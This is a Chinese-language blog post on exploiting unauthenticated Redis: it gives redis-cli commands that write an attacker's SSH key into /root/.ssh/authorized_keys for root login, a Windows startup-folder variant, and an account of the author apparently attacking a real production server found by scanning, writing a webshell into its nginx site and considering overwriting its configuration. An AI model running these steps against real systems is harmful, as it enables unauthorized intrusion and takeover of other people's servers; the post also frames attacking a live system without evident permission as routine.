<!DOCTYPE html>
<html lang="en">
    <!-- title -->


    

<!-- keywords -->



<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="author" content="Kizurena">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="Kizurena">
    
        <meta name="keywords" content="hexo,hexo-theme,hexo-blog">
    
    <meta name="description" content="">
    <meta name="description" content="0x00 前言最近终于挖到个有点意思的漏洞，比之前卵用没有的信息泄露好点。可惜因为是Windows Server，最后没搞到shell，不过也学到点东西吧。 Redis是最流行的非关系型即key-value数据库，通常用来做缓存。我之前写Java Web的时候，存储身份信息用的session和cookie，但据说用redis做token也可以。此外，如果查询数据量大，或者对并发要求高，也需要用re">
<meta property="og:type" content="article">
<meta property="og:title" content="Redis未授权访问原理及利用">
<meta property="og:url" content="https://kizureina.github.io/2023/07/07/The-exp-of-Redis-unauthorized/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="0x00 前言最近终于挖到个有点意思的漏洞，比之前卵用没有的信息泄露好点。可惜因为是Windows Server，最后没搞到shell，不过也学到点东西吧。 Redis是最流行的非关系型即key-value数据库，通常用来做缓存。我之前写Java Web的时候，存储身份信息用的session和cookie，但据说用redis做token也可以。此外，如果查询数据量大，或者对并发要求高，也需要用re">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://s1.ax1x.com/2023/07/07/pCcAaZD.png">
<meta property="og:image" content="https://s1.ax1x.com/2023/07/07/pCc13Jf.png">
<meta property="og:image" content="https://s1.ax1x.com/2023/07/07/pCctKeg.png">
<meta property="og:image" content="https://s1.ax1x.com/2023/07/07/pCctNOU.png">
<meta property="og:image" content="https://s1.ax1x.com/2023/07/07/pCct6l6.png">
<meta property="og:image" content="https://s1.ax1x.com/2023/07/07/pCctTpt.png">
<meta property="article:published_time" content="2023-07-07T02:51:45.000Z">
<meta property="article:modified_time" content="2023-07-07T08:35:08.666Z">
<meta property="article:author" content="Kizurena">
<meta property="article:tag" content="web">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s1.ax1x.com/2023/07/07/pCcAaZD.png">
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <link rel="icon" href="/assets/favicon.ico">
    
    <title>Redis未授权访问原理及利用 · Kizureina&#39;s Blog</title>
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
    (function (w) {
        'use strict'
        // rel=preload support test
        if (!w.loadCSS) {
            w.loadCSS = function () {}
        }
        // define on the loadCSS obj
        var rp = (loadCSS.relpreload = {})
        // rel=preload feature support test
        // runs once and returns a function for compat purposes
        rp.support = (function () {
            var ret
            try {
                ret = w.document.createElement('link').relList.supports('preload')
            } catch (e) {
                ret = false
            }
            return function () {
                return ret
            }
        })()

        // if preload isn't supported, get an asynchronous load by using a non-matching media attribute
        // then change that media back to its intended value on load
        rp.bindMediaToggle = function (link) {
            // remember existing media attr for ultimate state, or default to 'all'
            var finalMedia = link.media || 'all'

            function enableStylesheet() {
                link.media = finalMedia
            }

            // bind load handlers to enable media
            if (link.addEventListener) {
                link.addEventListener('load', enableStylesheet)
            } else if (link.attachEvent) {
                link.attachEvent('onload', enableStylesheet)
            }

            // Set rel and non-applicable media type to start an async request
            // note: timeout allows this to happen async to let rendering continue in IE
            setTimeout(function () {
                link.rel = 'stylesheet'
                link.media = 'only x'
            })
            // also enable media after 3 seconds,
            // which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
            setTimeout(enableStylesheet, 3000)
        }

        // loop through link elements in DOM
        rp.poly = function () {
            // double check this to prevent external calls from running
            if (rp.support()) {
                return
            }
            var links = w.document.getElementsByTagName('link')
            for (var i = 0; i < links.length; i++) {
                var link = links[i]
                // qualify links to those with rel=preload and as=style attrs
                if (
                    link.rel === 'preload' &&
                    link.getAttribute('as') === 'style' &&
                    !link.getAttribute('data-loadcss')
                ) {
                    // prevent rerunning on link
                    link.setAttribute('data-loadcss', true)
                    // bind listeners to toggle media back
                    rp.bindMediaToggle(link)
                }
            }
        }

        // if unsupported, run the polyfill
        if (!rp.support()) {
            // run once at least
            rp.poly()

            // rerun poly on an interval until onload
            var run = w.setInterval(rp.poly, 500)
            if (w.addEventListener) {
                w.addEventListener('load', function () {
                    rp.poly()
                    w.clearInterval(run)
                })
            } else if (w.attachEvent) {
                w.attachEvent('onload', function () {
                    rp.poly()
                    w.clearInterval(run)
                })
            }
        }

        // commonjs
        if (typeof exports !== 'undefined') {
            exports.loadCSS = loadCSS
        } else {
            w.loadCSS = loadCSS
        }
    })(typeof global !== 'undefined' ? global : this)
</script>

    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }
</style>

    <link rel="preload" href="/css/style.css?v=20211217" as="style" onload="this.onload=null;this.rel='stylesheet'">
    <link rel="preload" href="/css/dark.css?v=20211217" as="style">
    <link rel="stylesheet" href="/css/dark.css">
    <link rel="stylesheet" href="/css/mobile.css?v=20211217" media="(max-width: 960px)">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" as="script">
    <link rel="preload" href="/scripts/main.js?v=20211217" as="script">
    <link rel="preload" href="/scripts/dark.js?v=20211217" as="script">
    <link rel="preload" href="/font/Oswald-Regular.ttf" as="font" crossorigin>
    <link rel="preload" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" as="font" crossorigin>
    <!-- algolia -->
    
    <!-- 百度统计  -->
    
    <!-- 谷歌统计  -->
    
<meta name="generator" content="Hexo 6.3.0"></head>

    <script src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js"></script>
    <script type="text/javascript">
        if (typeof window.$ == undefined) {
            console.warn('jquery load from jsdelivr failed, will load local script')
            document.write('<script src="/lib/jquery.min.js" />')
        }
    </script>
    
        <body class="post-body">
    
        <!-- header -->
        <header class="header header-mobile">
    <!-- top read progress line -->
    <div class="header-element">
        <div class="read-progress"></div>
    </div>
    <!-- sidebar menu button -->
    <div class="header-element">
        
            <div class="header-sidebar-menu">
        
            
                <div style="padding-left: 1px;">&#xe775;</div>
            
        </div>
    </div>
    <!-- header actions -->
    <div class="header-actions">
        <!-- theme mode switch button -->
        <span class="header-theme-btn header-element">
            <i class="fas fa-adjust"></i>
        </span>
        <!-- back to home page text -->
        <span class="home-link header-element">
            <a href=/>Kizureina's Blog</a>
        </span>
    </div>
    <!-- toggle banner for post layout -->
    
        
            <div class="banner">
        
            <div class="blog-title header-element">
                <a href="/">Kizureina&#39;s Blog</a>
            </div>
            <div class="post-title header-element">
                <a href="#" class="post-name">Redis未授权访问原理及利用</a>
            </div>
        </div>
    
</header>

        <!-- fixed footer -->
        <footer class="footer-fixed">
    <!-- back to top button -->
    <div class="footer-fixed-element">
        
            <div class="back-top back-top-hidden">
        
        
            <div>&#xe639;</div>
        
        </div>
    </div>
</footer>

        <!-- wrapper -->
        <div class="wrapper">
            <div class="site-intro" style="







    height:50vh;

">
    
    <!-- 主页  -->
    
        
    <!-- 404页  -->
            
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(/intro/post-bg.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
                Redis未授权访问原理及利用
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
                
            <!-- 404 -->
            
        </p>
        <!-- 文章页 meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                    <div class= post-intro-tags >
    
    
        <a class="post-tag" href="javascript:void(0);" data-tags="web">web</a>
    
</div>

                
                
                    <div class="post-intro-read">
                        <span>Word count: <span class="post-count word-count">1.9k</span>Reading time: <span class="post-count reading-time">6 min</span></span>
                    </div>
                
                <div class="post-intro-meta">
                    <!-- 撰写日期 -->
                    <span class="iconfont-archer post-intro-calander">&#xe676;</span>
                    <span class="post-intro-time">2023/07/07</span>
                    <!-- busuanzi -->
                    
                        <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                            <span class="iconfont-archer post-intro-busuanzi">&#xe602;</span>
                            <span id="busuanzi_value_page_pv"></span>
                        </span>
                    
                    <!-- 文章分享 -->
                    <span class="share-wrapper">
                        <span class="iconfont-archer share-icon">&#xe71d;</span>
                        <span class="share-text">Share</span>
                        <ul class="share-list">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
        
    </div>
</div>

            <script>
  // get user agent
  function getBrowserVersions() {
    var u = window.navigator.userAgent
    return {
      userAgent: u,
      trident: u.indexOf('Trident') > -1, //IE内核
      presto: u.indexOf('Presto') > -1, //opera内核
      webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
      gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
      mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
      ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
      android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
      iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
      iPad: u.indexOf('iPad') > -1, //是否为iPad
      webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
      weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
      uc: u.indexOf('UCBrowser') > -1, //是否为android下的UC浏览器
    }
  }
  var browser = {
    versions: getBrowserVersions(),
  }
  console.log('userAgent: ' + browser.versions.userAgent)

  // callback
  function fontLoaded() {
    console.log('font loaded')
    if (document.getElementsByClassName('site-intro-meta')) {
      document
        .getElementsByClassName('intro-title')[0]
        .classList.add('intro-fade-in')
      document
        .getElementsByClassName('intro-subtitle')[0]
        .classList.add('intro-fade-in')
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in')
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb() {
    if (browser.versions.uc) {
      console.log('UCBrowser')
      fontLoaded()
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular'],
        },
        loading: function () {
          // 所有字体开始加载
          // console.log('font loading');
        },
        active: function () {
          // 所有字体已渲染
          fontLoaded()
        },
        inactive: function () {
          // 字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout')
          fontLoaded()
        },
        timeout: 5000, // Set the timeout to two seconds
      })
    }
  }

  function asyncErr() {
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document,
      t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0]
    o.src = u
    if (cb) {
      o.addEventListener(
        'load',
        function (e) {
          cb(null, e)
        },
        false
      )
    }
    if (err) {
      o.addEventListener(
        'error',
        function (e) {
          err(null, e)
        },
        false
      )
    }
    s.parentNode.insertBefore(o, s)
  }

  var asyncLoadWithFallBack = function (arr, success, reject) {
    var currReject = function () {
      reject()
      arr.shift()
      if (arr.length) async(arr[0], success, currReject)
    }

    async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack(
    [
      'https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js',
      'https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js',
      "/lib/webfontloader.min.js",
    ],
    asyncCb,
    asyncErr
  )
</script>

            <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
            <div class="container container-unloaded">
                <main class="main post-page">
    <article class="article-entry">
        <h2 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h2><p>最近终于挖到个有点意思的漏洞，比之前卵用没有的信息泄露好点。可惜因为是Windows Server，最后没搞到shell，不过也学到点东西吧。</p>
<p>Redis是最流行的非关系型即key-value数据库，通常用来做缓存。我之前写Java Web的时候，存储身份信息用的session和cookie，但据说用redis做token也可以。此外，如果查询数据量大，或者对并发要求高，也需要用redis做消息队列。</p>
<p>说起来比较有意思的是，我最早在面试安全社团的时候就遇到过redis未授权，但直到今天才搞明白。</p>
<h2 id="0x01-漏洞描述"><a href="#0x01-漏洞描述" class="headerlink" title="0x01 漏洞描述"></a>0x01 漏洞描述</h2><p>言归正传，导致漏洞的原因很简单：</p>
<blockquote>
<p>Redis 默认情况下，会绑定在 0.0.0.0:6379，如果没有进行采用相关的策略，比如添加防火墙规则避免其他非信任来源 ip 访问等，这样将会将 Redis 服务暴露到公网上，如果在没有设置密码认证（一般为空）的情况下，会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下，利用 Redis 自身的提供的config 命令，可以进行<strong>写文件操作</strong>，攻击者可以成功将自己的ssh公钥写入目标服务器的 &#x2F;root&#x2F;.ssh 文件夹的authotrized_keys 文件中，进而可以使用对应私钥直接使用ssh服务登录目标服务器。</p>
</blockquote>
<p>总结起来，产生条件有两点：</p>
<ol>
<li><p>redis监听在 0.0.0.0:6379，且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略，直接暴露在公网。</p>
</li>
<li><p>未设置登陆密码</p>
</li>
<li><p>(可选)redis以root权限运行</p>
</li>
</ol>
<p>产生危害：</p>
<blockquote>
<p>Under certain conditions, if Redis runs with the root account (or not even), attackers can write an SSH public key file to the root account, directly logging on to the victim server through SSH. This may allow hackers to gain server privileges, delete or steal data, or even lead to an encryption extortion, critically endangering normal business services.</p>
</blockquote>
<p>总之，如何存在redis未授权，有很大可能getshell，尤其在Linux下。</p>
<h2 id="0x02-漏洞利用"><a href="#0x02-漏洞利用" class="headerlink" title="0x02 漏洞利用"></a>0x02 漏洞利用</h2><h4 id="1-Linux写入SSH密钥getshell"><a href="#1-Linux写入SSH密钥getshell" class="headerlink" title="1. Linux写入SSH密钥getshell"></a>1. Linux写入SSH密钥getshell</h4><p>SSH连接需要配置公钥私钥，这种配置也可以用来做免密SFTP文件传输，主要流程：</p>
<blockquote>
<p>1、客户端生成RSA公钥和私钥</p>
<p>2、客户端将自己的公钥存放到服务器</p>
<p>3、客户端请求连接服务器，服务器将一个随机字符串发送给客户端</p>
<p>4、客户端根据自己的私钥加密这个随机字符串之后再发送给服务器</p>
<p>5、服务器接受到加密后的字符串之后用公钥解密，如果正确就让客户端登录，否则拒绝。这样就不用使用密码了。</p>
</blockquote>
<p>生成密钥需要用Linux下的ssh-keygen命令，Windows下用git bash也可以直接用，生成RSA公钥私钥对：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh-keygen -t rsa</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://imgse.com/i/pCcAaZD"><img src="https://s1.ax1x.com/2023/07/07/pCcAaZD.png" alt="pCcAaZD.png"></a></p>
<p>然后就是redis未授权的利用了，上面的描述可以看出来，这个漏洞的实质就是<strong>通过redis提供的数据库持久化命令写文件</strong>。因此将生成的公钥写入服务器，就能使用SSH连接getshell了。</p>
<p>先将生成公钥文件上传到redis数据库：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> id_rsa.pub | redis-cli -h 192.168.1.16 -p 6379 -x <span class="built_in">set</span> crack</span><br><span class="line">OK</span><br></pre></td></tr></table></figure>

<p>这行命令实际上是先用cat打印出文件中数据，然后利用管道符将数据重定向至redis-cli，并作为-x即设置key-value值的参数，<strong>在数据库中插入key为crack，value为公钥文件数据的一行记录</strong>：</p>
<p><a target="_blank" rel="noopener" href="https://imgse.com/i/pCc13Jf"><img src="https://s1.ax1x.com/2023/07/07/pCc13Jf.png" alt="pCc13Jf.png"></a></p>
<p>此时数据插入数据库，但只是在内存中，接下来<strong>需要使用redis持久化命令写入文件</strong>。</p>
<p>然后使用redis-cli连接redis数据库进入redis命令行：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">redis-cli -h 192.168.1.16 -p 6379</span><br><span class="line">192.168.1.16:6379&gt;config <span class="built_in">set</span> <span class="built_in">dir</span> /root/.ssh</span><br><span class="line">OK</span><br></pre></td></tr></table></figure>

<p>此时切换环境变量<em><strong>dir</strong></em>(即数据库所在根目录)，设置为root密钥目录。</p>
<blockquote>
<p>此外，这里切换目录时，如果目录不存在会报错，我感觉这里可以用目录扫描+redis的INFO命令中的redis根路径来猜出实际目录结构。</p>
</blockquote>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">192.168.1.16:6379&gt;config <span class="built_in">set</span> <span class="built_in">dir</span> /root/.ssh</span><br><span class="line">OK</span><br></pre></td></tr></table></figure>

<p>这里需要<strong>权限</strong>，我试了下自己装的docker里redis使用这条命令会报错dir是protected变量，不能修改。</p>
<p>然后修改环境变量数据库持久化文件名<em><strong>dbfilename</strong></em>:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">192.168.1.16:6379&gt;config <span class="built_in">set</span> filename authorized_keys</span><br><span class="line">OK</span><br></pre></td></tr></table></figure>

<p>authorized_keys是SSH连接允许的公钥列表文件的默认文件名。</p>
<blockquote>
<p>这里我也想到一点东西，如果当前数据库目录下已经存在同名文件会怎么样？应该是覆盖</p>
</blockquote>
<p>最后保存即可连接成功：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">192.168.1.16:6379&gt;save</span><br><span class="line">OK</span><br><span class="line">ssh -i id_rsa root@192.168.1.16</span><br><span class="line">root@192.168.1.16<span class="comment"># whoami</span></span><br><span class="line">root</span><br></pre></td></tr></table></figure>

<p>当然还有很多其他操作，<strong>crontab计划任务反弹shell</strong>也是有意思的思路，其他详见<a target="_blank" rel="noopener" href="https://blog.csdn.net/q20010619/article/details/121912003">参考</a>。</p>
<h4 id="2-Windows写入自启动目录"><a href="#2-Windows写入自启动目录" class="headerlink" title="2. Windows写入自启动目录"></a>2. Windows写入自启动目录</h4><p>上面的办法简单高效，但只适用于与Linux，如果是Windows server怎么办呢？</p>
<p>上面参考链接的crontab反弹shell给了一个思路，就是<strong>利用启动项</strong>。</p>
<p>和Linux不太相同，Windows的自启动有几类：系统服务、计划任务、注册表启动项、用户的startup目录。其中前三种是无法通过单纯向某目录中写文件实现精准篡改的，因此只有startup目录可以利用。</p>
<p>startup的绝对路径如下：</p>
<p><code>C:\Users\[username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</code></p>
<p>虽然想知道用户名并不容易，但把常用的用户名挨个跑一遍，万一就成功了呢？<em>八成是Administrator</em></p>
<p><a target="_blank" rel="noopener" href="https://imgse.com/i/pCctKeg"><img src="https://s1.ax1x.com/2023/07/07/pCctKeg.png" alt="pCctKeg.png"></a></p>
<p>然后等待服务器重启即可（虽然还是只能等，而且要赌一把服务器会重启）。</p>
<h2 id="0x03-实际渗透"><a href="#0x03-实际渗透" class="headerlink" title="0x03 实际渗透"></a>0x03 实际渗透</h2><p>这次扫信息发布网，终于碰到了Redis未授权:</p>
<p><a target="_blank" rel="noopener" href="https://imgse.com/i/pCctNOU"><img src="https://s1.ax1x.com/2023/07/07/pCctNOU.png" alt="pCctNOU.png"></a></p>
<p>所以很容易就连上了Redis数据库，用INFO命令得到一些信息，但有用的只有config_file:</p>
<p><a target="_blank" rel="noopener" href="https://imgse.com/i/pCct6l6"><img src="https://s1.ax1x.com/2023/07/07/pCct6l6.png" alt="pCct6l6.png"></a></p>
<p>当然此时就可以随便对数据库增删改查了，果然是非常非常危险的漏洞。但很可惜是Windows server的服务器，所以大部分getshell的操作都用不来。</p>
<p>不过在对服务器仔细看了下，我发现用到了nginx中间件，那么能不能写入webshell呢？听起来有点搞头。</p>
<p>写webshell需要两个条件：</p>
<ol>
<li><p>知道nginx静态文件目录的路径</p>
</li>
<li><p>知道这些文件对应的URL，并且能够正常访问</p>
</li>
</ol>
<p>老实说，两个都不容易达到。但第一个可以通过config_file的路径猜下：</p>
<p><a target="_blank" rel="noopener" href="https://imgse.com/i/pCctTpt"><img src="https://s1.ax1x.com/2023/07/07/pCctTpt.png" alt="pCctTpt.png"></a></p>
<p>居然很容易就猜出来了！然后写入webshell一句话木马当然也没什么难度了。</p>
<p>这里我其实想到可以写一个类似于disearch这种目录扫描工具做实际路径猜测，路径是否存在回显非常明显嘛。</p>
<p>可惜麻烦的是第二步，扫了半天目录又猜了半天，还是没办法对应起来，主要是没见过这种比较复杂的静态网站的nginx目录结构。</p>
<p>但是猜到了<code>/nginx/conf</code>的路径，有没有可能用ngnix.conf覆盖本来的配置呢？我感觉这也是一种有意思的思路，可惜是生产环境没办法测试。</p>

    </article>
    <!-- license -->
    
        <div class="license-wrapper">
            <p>Author：<a href="https://kizureina.github.io">Kizurena</a>
            <p>Link：<a href="https://kizureina.github.io/2023/07/07/The-exp-of-Redis-unauthorized/">https://kizureina.github.io/2023/07/07/The-exp-of-Redis-unauthorized/</a>
            <p>Publish date：<a href="https://kizureina.github.io/2023/07/07/The-exp-of-Redis-unauthorized/">July 7th 2023, 10:51:45 am</a>
            <p>Update date：<a href="https://kizureina.github.io/2023/07/07/The-exp-of-Redis-unauthorized/">July 7th 2023, 4:35:08 pm</a>
            <p>License：本文采用<a rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by-nc/4.0/">知识共享署名-非商业性使用 4.0 国际许可协议</a>进行许可</p>
        </div>
    
    <!-- paginator -->
    <ul class="post-paginator">
        <li class="next">
            
        </li>
        <li class="previous">
            
                <div class="prevSlogan">Previous Post</div>
                <a href="/2023/06/05/Start-of-Java-Sec-command-execute-and-reflection/" title="Java安全入门：命令执行，反射与反序列化">
                    <div class="prevTitle">Java安全入门：命令执行，反射与反序列化</div>
                </a>
            
        </li>
    </ul>
    <!-- comment -->
    
        <div class="post-comment">
            <!-- 来必力 City 版安装代码 -->


            

            

            

            <!-- utteranc评论 -->


            <!-- partial('_partial/comment/changyan') -->
            <!--PC版-->


            
            

            

        </div>
    
    <!-- timeliness note -->
    <!-- idea from: https://hexo.fluid-dev.com/posts/hexo-injector/#%E6%96%87%E7%AB%A0%E6%97%B6%E6%95%88%E6%80%A7%E6%8F%90%E7%A4%BA -->
    
    <!-- Mathjax -->
    
</main>

                <!-- profile -->
                
            </div>
            <footer class="footer footer-unloaded">
    <!-- social  -->
    
        <div class="social">
            
    
        
            
                <a href="mailto:tsukinomito@mailfence.com" class="iconfont-archer email" title=email ></a>
            
        
    
        
            
                <a href="//github.com/Kizureina" class="iconfont-archer github" target="_blank" title=github></a>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    


        </div>
    
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- website approve for Chinese user -->
    
    <!-- 不蒜子  -->
    
        <div class="busuanzi-container">
            
             
                <span id="busuanzi_container_site_pv">PV: <span id="busuanzi_value_site_pv"></span> :)</span>
            
        </div>
    	
</footer>

        </div>
        <!-- toc -->
        
            <div class="toc-wrapper toc-wrapper-loding" style=







    top:50vh;

>
                <div class="toc-catalog">
                    <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
                </div>
                <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">0x00 前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-%E6%BC%8F%E6%B4%9E%E6%8F%8F%E8%BF%B0"><span class="toc-number">2.</span> <span class="toc-text">0x01 漏洞描述</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-number">3.</span> <span class="toc-text">0x02 漏洞利用</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-Linux%E5%86%99%E5%85%A5SSH%E5%AF%86%E9%92%A5getshell"><span class="toc-number">3.0.1.</span> <span class="toc-text">1. Linux写入SSH密钥getshell</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-Windows%E5%86%99%E5%85%A5%E8%87%AA%E5%90%AF%E5%8A%A8%E7%9B%AE%E5%BD%95"><span class="toc-number">3.0.2.</span> <span class="toc-text">2. Windows写入自启动目录</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-%E5%AE%9E%E9%99%85%E6%B8%97%E9%80%8F"><span class="toc-number">4.</span> <span class="toc-text">0x03 实际渗透</span></a></li></ol>
            </div>
        
        <!-- sidebar -->
        <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
        <div class="sidebar-panel-archives">
    <!-- 在 ejs 中将 archive 按照时间排序 -->
    
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
    
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
        
    
    
    
    
    <div class="total-and-search">
        <div class="total-archive">
        Total : 24
        </div>
        <!-- search  -->
        
    </div>
    
    <div class="post-archive">
    
        
            
            
            <div class="archive-year"> 2023 </div>
            <ul class="year-list">
            
        
        <li class="archive-post-item">
            <span class="archive-post-date">07/07</span>
            <a class="archive-post-title" href="/2023/07/07/The-exp-of-Redis-unauthorized/">Redis未授权访问原理及利用</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">06/05</span>
            <a class="archive-post-title" href="/2023/06/05/Start-of-Java-Sec-command-execute-and-reflection/">Java安全入门：命令执行，反射与反序列化</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">03/22</span>
            <a class="archive-post-title" href="/2023/03/22/Note-of-SpringBoot-learning/">SpringBoot学习笔记</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">03/12</span>
            <a class="archive-post-title" href="/2023/03/12/Note-of-SpringMVC-learning/">SpringMVC学习笔记</a>
        </li>
    
        
        <li class="archive-post-item">
            <span class="archive-post-date">02/12</span>
            <a class="archive-post-title" href="/2023/02/12/Note-of-Spring-learning/">Spring学习笔记</a>
        </li>
    
        
        <li class="archive-post-item">
